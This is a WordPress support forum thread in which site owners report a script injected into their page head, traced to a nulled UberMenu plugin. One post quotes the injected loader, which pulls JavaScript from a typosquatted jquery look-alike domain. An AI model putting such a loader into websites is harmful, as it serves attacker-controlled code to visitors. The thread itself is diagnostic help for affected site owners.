WordPress.org

Ready to get started?Download WordPress

Forums

unknown script added via wp_head , how to find it ?? (8 posts)

  1. walkout
    Member
    Posted 1 year ago #

    Hey guys ,
    In my wp site - in head section
    <script type="text/javascript"> if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.juquery.com/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.juquery.com/jquery.js"></scr'+'ipt>'); } </script>

    If you guys could notice minutely -
    url of jquery is incorrect juquery.com instead of jquery.com , further
    i dont want above script to be included.

    Now i am not sure from where this is being called
    I recehcked my functions.php files , and all the theme and external plugins file which i have installed , but i cant find from where this hook was fired.

    can some one suggest me way , i could find from where this script is being called ???

    Thanks in advance

  2. walkout
    Member
    Posted 1 year ago #

    hey never mind - i found the hook from where is was being fired from , one of the plugin files.
    Please close this thread this issue is resolved.

    Thanks

  3. srschroeder
    Member
    Posted 1 year ago #

    Where did you find it? i need to find also and can't

  4. esmi
    Forum Moderator
    Posted 1 year ago #

    Have you tried:

    - deactivating all plugins to see if this resolves the problem. If this works, re-activate the plugins one by one until you find the problematic plugin(s).

    - switching to the Twenty Eleven theme to rule out any theme-specific problems.

    - resetting the plugins folder by FTP or PhpMyAdmin. Sometimes, an apparently inactive plugin can still cause problems.

  5. walkout
    Member
    Posted 1 year ago #

    Hi esmi ,
    Thanks for the support.

    To locate from which file , it was being called.

    In windows search , I searched for all php files inside each plugin folder.

    Opened it up in notepad ++ , searched for script name , as appearing in wordpress head in all "open documents". and i got the bug in ubermenu plugin was nulled version and had few lines of coded added up in between the main code.

    Hope it helps.

    Thanks

  6. giancsfo
    Member
    Posted 1 year ago #

    Hi, i have the same issue. How to solve?

  7. yettezkiedoodle
    Member
    Posted 1 year ago #

    Hi, I have the same issue. I already tried deactivating my plugins but the tag is still there. I tried changing my theme and it did load properly, but is there a way to go around this? I really cannot afford to change my layout, and I am not sure either if this is the main cause.

  8. esmi
    Forum Moderator
    Posted 1 year ago #

Topic Closed

This topic has been closed to new replies.

About this Topic